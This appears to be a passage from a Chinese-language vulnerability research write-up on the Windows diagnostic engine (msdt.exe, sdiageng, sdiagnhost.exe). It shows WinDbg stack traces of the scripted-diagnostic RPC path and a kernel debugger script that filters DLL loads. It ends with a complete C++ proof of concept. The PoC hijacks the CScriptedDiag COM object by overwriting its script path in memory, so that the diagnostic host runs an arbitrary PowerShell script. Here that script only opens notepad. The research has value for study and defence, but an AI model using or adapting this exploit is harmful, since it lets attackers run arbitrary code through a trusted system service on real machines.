fffff880`06c0c4b0 fffff800`028eb1af : 00000000`0000001c fffffa80`321fe060 fffffa80`00000000 fffff8a0`06fd1340 : nt!KiCommitThreadWait+0x1d2
fffff880`06c0c540 fffff800`0290575f : 00000000`00000000 fffff800`00000011 00000000`00020001 fffff8a0`06fd1300 : nt!KeWaitForSingleObject+0x19f
fffff880`06c0c5e0 fffff800`02bf3376 : 00000000`00000000 fffffa80`321fe420 00000000`00000001 00000000`00000000 : nt!AlpcpSignalAndWait+0x8f
fffff880`06c0c690 fffff800`02bf2a70 : 00000000`00000000 00000000`03e725c0 00000000`03e77a88 63536553`00000701 : nt!AlpcpReceiveSynchronousReply+0x46
fffff880`06c0c6f0 fffff800`02bf086b : fffffa80`334e5af0 fffffa80`00020000 00000000`03e725c0 00000000`03e77a88 : nt!AlpcpProcessSynchronousRequest+0x33d
fffff880`06c0c830 fffff880`04027b86 : 00000000`00000000 fffff880`06c0cb60 fffff880`06c0c920 00000000`00000000 : nt!NtAlpcSendWaitReceivePort+0x1ab
fffff880`06c0c8e0 fffff800`028e28d3 : fffffa80`321fe060 00000000`028ae688 fffff880`04027a8c 00000000`03e77a88 : 360Hvm64+0x17b86
fffff880`06c0ca70 00000000`77491b6a : 000007fe`fdc2a776 00000000`00000000 00000000`03e73820 00000000`028ae8a0 : nt!KiSystemServiceCopyEnd+0x13 (TrapFrame @ fffff880`06c0cae0)
00000000`028ae668 000007fe`fdc2a776 : 00000000`00000000 00000000`03e73820 00000000`028ae8a0 00000000`01dc0208 : ntdll!NtAlpcSendWaitReceivePort+0xa
00000000`028ae670 000007fe`fdc24e42 : 00000000`03e11470 00000000`01e20800 00000000`0302a2d0 00000000`028ae8a0 : RPCRT4!LRPC_CCALL::SendReceive+0x156
00000000`028ae730 000007fe`fe3b28c0 : 00000000`002b9940 00000000`002b9940 00000000`03e73790 00000000`02fe0ad0 : RPCRT4!I_RpcSendReceive+0x42
00000000`028ae760 000007fe`fe3b282f : 00000000`00000000 00000000`002b9940 00000000`03e73790 00000000`03e73820 : ole32!ThreadSendReceive+0x40 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 5003]
00000000`028ae7b0 000007fe`fe3b265b : 00000000`00000000 00000000`03e73790 00000000`003bea9d 000007fe`ffffffff : ole32!CRpcChannelBuffer::SwitchAptAndDispatchCall+0xa3 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 4454]
00000000`028ae850 000007fe`fe26daaa : 00007990`b77d4ecb 00000000`002b9940 00000000`00000100 000007fe`fe418810 : ole32!CRpcChannelBuffer::SendReceive2+0x11b [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 4074]
00000000`028aea10 000007fe`fe26da0c : 00000000`00000000 00000001`55535243 00000000`03e851a2 00000000`002b9940 : ole32!CAptRpcChnl::SendReceive+0x52 [d:\w7rtm\com\ole32\com\dcomrem\callctrl.cxx @ 603]
00000000`028aeae0 000007fe`fe3b205d : 00000000`028aed40 00000000`00000000 00000000`00000000 00000000`03e62f28 : ole32!CCtxComChnl::SendReceive+0x68 [d:\w7rtm\com\ole32\com\dcomrem\ctxchnl.cxx @ 734]
00000000`028aeb90 000007fe`fdccfd61 : 00000000`03e84b78 00000000`00000000 00000000`03e62f28 00000000`01e2b3c0 : ole32!NdrExtpProxySendReceive+0x45 [d:\w7rtm\com\rpc\ndrole\proxy.cxx @ 1932]
00000000`028aebc0 000007fe`fe3af82f : 00000000`03e7d570 00000000`7749413d 00000000`01dc0000 00000000`02000002 : RPCRT4!NdrpClientCall2+0x9ea
00000000`028af330 000007fe`fe26d8a2 : 00000000`00000000 00000000`00000000 00000000`03e62f28 000007fe`fe310cf6 : ole32!ObjectStublessClient+0x1ad [d:\w7rtm\com\rpc\ndrole\amd64\stblsclt.cxx @ 620]
00000000`028af6c0 000007fe`f8f9cb68 : 00000000`03e62f28 00000000`002a5ab8 00000000`03e660e0 00000000`03e66130 : ole32!ObjectStubless+0x42 [d:\w7rtm\com\rpc\ndrole\amd64\stubless.asm @ 117]
00000000`028af710 000007fe`f8f980fe : 00000000`00000000 00000000`00000000 00000000`03e660e0 00000000`03e66130 : sdiageng!Script::Run+0x264 //重点
00000000`028af7a0 000007fe`f8f94418 : 00000000`00000000 00000000`00000000 00000000`028af8a8 00000000`0021e03a : sdiageng!Rootcause::Resolve+0x162
00000000`028af800 000007fe`f8f8f942 : 00000000`00000000 00000000`03e195e8 00000000`0021e950 00000000`028af8c0 : sdiageng!DiagPackage::Resolve+0x88
00000000`028af840 00000000`ff592f5e : 00000000`00000004 00000000`028af9b0 00000000`00000005 00000000`0021e950 : sdiageng!CScriptedDiag::Resolve+0x296 //重点
00000000`028af8f0 00000000`ff593110 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`002199d0 : msdt!SDEngine::Resolve+0xa2
00000000`028af930 00000000`ff592da1 : 00000000`00000000 00000000`00000000 00000000`00000001 00000000`00000000 : msdt!SDEngine::ResolveAndVerifyResolution+0x170
00000000`028af9a0 00000000`ff5aa72c : 00000000`00395cf0 00000000`00395cf0 00000000`00000000 00000000`00000000 : msdt!SDEngine::Resolve+0x265
00000000`028afa30 00000000`7733652d : 00000000`00000000 00000000`00000001 00000000`002199d0 00000000`0021a750 : msdt!WorkerThread+0x5c8
00000000`028afaa0 00000000`7746c521 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0xd
00000000`028afad0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000\`00000000 : ntdll!RtlUserThreadStart+0x1d
sendmessage:
服务端:
THREAD fffffa8032d6e060 Cid 0a60.0824 Teb: 000007fffffda000 Win32Thread: fffff900c1fed010 RUNNING on processor 1
Not impersonating
DeviceMap fffff8a0012438b0
Owning Process fffffa803135f300 Image: sdiagnhost.exe
Attached Process N/A Image: N/A
Wait Start TickCount 251709 Ticks: 1 (0:00:00:00.015)
Context Switch Count 559 IdealProcessor: 0 LargeStack
UserTime 00:00:00.748
KernelTime 00:00:00.483
Win32 Start Address ntdll!TppWorkerThread (0x000000007745fbc0)
Stack Init fffff88006dd3c70 Current fffff88006dd3680
Base fffff88006dd4000 Limit fffff88006dcb000 Call 0000000000000000
Priority 9 BasePriority 8 PriorityDecrement 0 IoPriority 2 PagePriority 5
Child-SP RetAddr : Args to Child : Call Site
00000000`003ae578 000007fe`fdc223d5 : 00000000`0022ff40 00000000`0043df68 00000000`1af5db50 00000000`1af728c0 : sdiagnhost!CScriptedDiagNativeHost::RunScript+0x3 //重点
00000000`003ae580 000007fe`fdc169b2 : 00000000`003ae9b0 00000000`00443b00 00000000`00000030 00000000`00443ab4 : RPCRT4!Invoke+0x65
00000000`003ae5e0 000007fe`fe3af16e : 00000000`00422d70 00000000`00000001 00000000`00000000 00000000`003aec88 : RPCRT4!NdrStubCall2+0x32a
00000000`003aec00 000007fe`fe0710b4 : 00000000`00000001 00000000`004343c0 00000000`00422d70 00000000`004343c0 : ole32!CStdStubBuffer_Invoke+0x8b [d:\w7rtm\com\rpc\ndrole\stub.cxx @ 1559]
00000000`003aec30 000007fe`fe3b0ccd : 00000000`00000000 00000000`0040c2b0 00000000`00000000 00000000`00000000 : OLEAUT32!CUnivStubWrapper::Invoke+0xe4
00000000`003aec80 000007fe`fe3b0c43 : 00000000`004314f0 00000000`0043c2f4 00000000`00433500 00000000`ffa215c8 : ole32!SyncStubInvoke+0x5d [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1187]
00000000`003aecf0 000007fe`fe26a4f0 : 00000000`004314f0 00000000`00431060 00000000`004314f0 00000000`003e0000 : ole32!StubInvoke+0xdb [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1396]
00000000`003aeda0 000007fe`fe3b14d6 : 00000000`00000000 00000000`00000010 00000000`004343c0 00000000`00422d70 : ole32!CCtxComChnl::ContextInvoke+0x190 [d:\w7rtm\com\ole32\com\dcomrem\ctxchnl.cxx @ 1262]
00000000`003aef30 000007fe`fe3b122b : 00000000`d0908070 00000000`00431060 00000000`00431650 00000000`00422650 : ole32!AppInvoke+0xc2 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1086]
00000000`003aefa0 000007fe`fe3afd6d : 00000000`00431060 00000000`00431060 00000000`00422d70 00000000`00070005 : ole32!ComInvokeWithLockAndIPID+0x52b [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1727]
00000000`003af130 000007fe`fdc150f4 : 000007fe`fe419930 00000000`00000000 00000000`0043d820 000007fe`fdc0e8f7 : ole32!ThreadInvoke+0x30d [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 4751]
00000000`003af1d0 000007fe`fdc14f56 : 000007fe`fe3c0ab0 00000000`00000001 00000000`003af440 000007fe`fe248ffc : RPCRT4!DispatchToStubInCNoAvrf+0x14
00000000`003af200 000007fe`fdc1775b : 00000000`0043c2d0 00000000`00000000 00000000`003af524 00000000`0043c2d0 : RPCRT4!RPC_INTERFACE::DispatchToStubWorker+0x146
00000000`003af320 000007fe`fdc1769b : 00000000`00000000 00000000`003af440 00000000`003af440 00000000`0043d820 : RPCRT4!RPC_INTERFACE::DispatchToStub+0x9b
00000000`003af360 000007fe`fdc17632 : 00000000`0043c2d0 00000000`0043c2d0 00000000`0043c2d0 000007fe`fdc16140 : RPCRT4!RPC_INTERFACE::DispatchToStubWithObject+0x5b
00000000`003af3e0 000007fe`fdc1532d : 00000000`00000001 00000000`00000000 000007fe`fdbf0000 00000000`0043c2d0 : RPCRT4!LRPC_SCALL::DispatchRequest+0x422
00000000`003af4c0 000007fe`fdc32e7f : 00000000`00010000 00000000`0041dc80 00000000`00000000 00000000`00000001 : RPCRT4!LRPC_SCALL::HandleRequest+0x20d
00000000`003af5f0 000007fe`fdc32a35 : 00000000`00000000 00000000`00000000 00000000`0041dd80 00000000`00000000 : RPCRT4!LRPC_ADDRESS::ProcessIO+0x3bf
00000000`003af730 00000000`7745b68b : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : RPCRT4!LrpcIoComplete+0xa5
00000000`003af7c0 00000000`7745feff : 00000000`00000000 00000000`00000000 00000000`0000ffff 00000000`00000000 : ntdll!TppAlpcpExecuteCallback+0x26b
00000000`003af850 00000000`7733652d : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!TppWorkerThread+0x3f8
00000000`003afb50 00000000`7746c521 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0xd
00000000`003afb80 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x1d
可能用到的调试脚本:
效果和3环调试的时候用“sxe ld”命令差不多(因为是靠DbgkMapViewOfSection实现的),可用于内核调试过滤全局dll加载 ba e1 nt!DbgkMapViewOfSection "$$><【your script path】"
.block{
.if($spat("${DLLPath}","*reseteng.dll*")){
.echo [*] Block: ${DLLPath};
ad*;
!thread;
}
.else{
.echo [*] Pass: ${DLLPath};
ad*;
gc;
}
}
exp:使用“/p”选项可针对特定进程
其他
THREAD ffffd50ae7232080 Cid 10f4.04bc Teb: 0000008cb4663000 Win32Thread: 0000000000000000 RUNNING on processor 0
Not impersonating
DeviceMap ffff980cbda8c6f0
Owning Process ffffd50ae7db3080 Image: msdt.exe
Attached Process N/A Image: N/A
Wait Start TickCount 17607 Ticks: 1 (0:00:00:00.015)
Context Switch Count 9 IdealProcessor: 3
UserTime 00:00:00.000
KernelTime 00:00:00.015
Win32 Start Address msdt!WorkerThread (0x00007ff6401d6630)
Stack Init ffffe509d1c1f650 Current ffffe509d1c1f060
Base ffffe509d1c20000 Limit ffffe509d1c19000 Call 0000000000000000
Priority 11 BasePriority 8 PriorityDecrement 2 IoPriority 2 PagePriority 5
Child-SP RetAddr : Args to Child : Call Site
0000008c`b4a7f998 00007ff6`401f0473 : 00000000`00000000 000001f2`47e665f0 000001f2`47c4cdd8 000001f2`47c4fd40 : sdiageng!CScriptedDiag::Initialize+0x3 //重点
0000008c`b4a7f9a0 00007ff6`401f1037 : 00000000`00000000 000001f2`47e6d7f0 0000008c`b4a7fa70 000001f2`4d1c53c8 : msdt!PackageCollection::InitializePackage+0x1cb
0000008c`b4a7fa00 00007ff6`401ef17b : 00000000`00000000 000001f2`47e665f0 000001f2`47c39e08 00000000`00000001 : msdt!PackageCollection::LoadConfigFile+0x43b
0000008c`b4a7faa0 00007ff6`401e5ba2 : 00000000`00000000 000001f2`47c50160 0000008c`b4a7fb20 0000008c`b4a7fb20 : msdt!PackageCollection::AddPackageConfig+0xcb
0000008c`b4a7faf0 00007ff6`401d89cd : 00000000`00000001 00000000`00000000 00000000`00000000 000001f2`47e66650 : msdt!Packages_Load+0x15a
0000008c`b4a7fb60 00007ff6`401d6c4d : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : msdt!SkipIntro+0x11
0000008c`b4a7fba0 00007ffe`8bb57034 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : msdt!WorkerThread+0x61d
0000008c`b4a7fc00 00007ffe`8c0a2651 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
0000008c`b4a7fc30 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
可见参数是:
PoC:
#include <stdio.h>
#include <stdlib.h>
#include <wincrypt.h>
#include <iostream>
#include <process.h>
#include <tchar.h>
#include <strsafe.h>
#include <atlstr.h>
#pragma warning(disable:4996)
//////////////////////////////////////////////////////////
typedef
HRESULT(__stdcall* PFN_DllGetClassObject)(const IID* const rclsid, const IID* const riid, LPVOID* ppv);
const CLSID
CLSID_CScriptedDiag =
{
0x1F3D8AA5,
0x9EBF,
0x4EE4,
{ 0x85, 0xC2, 0xEA, 0x40, 0x37, 0x9A, 0xED, 0xE8 }
};
const IID
IID_IScriptedDiagnosticExecution =
{
0x6D5E9074,
0x62EF,
0x4F05,
{ 0x90, 0x2A, 0x46, 0xEC, 0xDF, 0xF1, 0xEF, 0x68 }
};
MIDL_INTERFACE("1F3D8AA5-9EBF-4EE4-85C2-EA40379AEDE8")
IScriptedDiagFactory : public IUnknown{
STDMETHOD(CreateInstance) (IUnknown*,_GUID const&,PVOID*);
STDMETHOD(LockServer) (int);
};
//////////////////////////////////////////////////////////
WCHAR g_pwszFormatOfXML[] = L"<?xml version=\"1.0\" encoding=\"utf-8\"?><Answers Version=\"1.0\"></Answers>";
WCHAR g_pwszSdpPath[] = L"C:\\Windows\\diagnostics\\system\\PCW";
BSTR g_bstrSdpDir = NULL;
BSTR g_bstrXML = NULL;
//////////////////////////////////////////////////////////
_inline
VOID InitBstr()
{
g_bstrXML = SysAllocString(g_pwszFormatOfXML);
g_bstrSdpDir = SysAllocString(g_pwszSdpPath);
}
const char g_byScript[] = "function Read-MessageBoxDialog\n\
{\n\
IEX(\"notepad.exe\")\n\
}\n\
Read-MessageBoxDialog";
BSTR g_bstrScriptPath;
unsigned __stdcall Worker2(void*)
{
HRESULT hr;
PFN_DllGetClassObject pfnDllGetClassObject = NULL;
PVOID pScriptedDiagFactory = NULL;
PVOID pScriptedDiag = NULL;
BSTR bstrString = NULL;
PWCHAR pwszTempSDIAGPath = NULL;
WCHAR wszPsPath[MAX_PATH];
FILE* pFile = NULL;
CoInitializeEx(NULL, COINIT_MULTITHREADED);
hr = CoCreateInstance(
CLSID_CScriptedDiag,
NULL,
CLSCTX_ALL,
IID_IScriptedDiagnosticExecution,
&pScriptedDiag);
if (hr < 0)
{
printf("[!] error0 | hr: %08x\n", hr);
goto __end1;
}
//Initialize
hr = ((HRESULT(__stdcall*)(PVOID, BSTR, PVOID, BSTR))(PVOID)((PULONG_PTR)(*(PULONG_PTR)pScriptedDiag))[7])(
pScriptedDiag, g_bstrSdpDir, NULL, g_bstrXML);
if (hr < 0)
{
printf("[!] error1 | hr: %08x\n", hr);
goto __end1;
}
pwszTempSDIAGPath = (PWCHAR)(((PULONG_PTR)((PULONG_PTR)pScriptedDiag)[3])[3]);
PathRemoveFileSpec(pwszTempSDIAGPath);
StringCbPrintf((STRSAFE_LPWSTR)wszPsPath, MAX_PATH * 2, L"%s\\result\\result.ps1", pwszTempSDIAGPath);
g_bstrScriptPath = SysAllocString(wszPsPath);
pFile = _wfopen(wszPsPath, L"w+");
fwrite(g_byScript, 1, strlen(g_byScript), pFile);
fclose(pFile);
//noteice here: by replacing the script path, i can still execute any script
//替换脚本路径
((PULONG_PTR)((PULONG_PTR)((PULONG_PTR)((PULONG_PTR)pScriptedDiag)[4])[2])[1])[1] = (ULONG_PTR)g_bstrScriptPath;
//Diagnose,启动服务sdiagnhost.exe 和执行脚本(此时路径已被我篡改)
hr = ((HRESULT(__stdcall*)(PVOID, BSTR*))(PVOID)((PULONG_PTR)(*(PULONG_PTR)pScriptedDiag))[18])(
pScriptedDiag, &bstrString);
if (hr < 0)
{
printf("[!] error2 | hr: %08x\n", hr);
goto __end1;
}
__end1:
CoUninitialize();
return 0;
}
int
APIENTRY
_tWinMain(
HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPTSTR lpCmdLine,
int nCmdShow
)
{
HANDLE hThread = NULL;
InitBstr();
hThread =
(HANDLE)_beginthreadex(NULL, 0, Worker2, NULL, 0, 0);
WaitForSingleObject(hThread, INFINITE);
return 0;
}
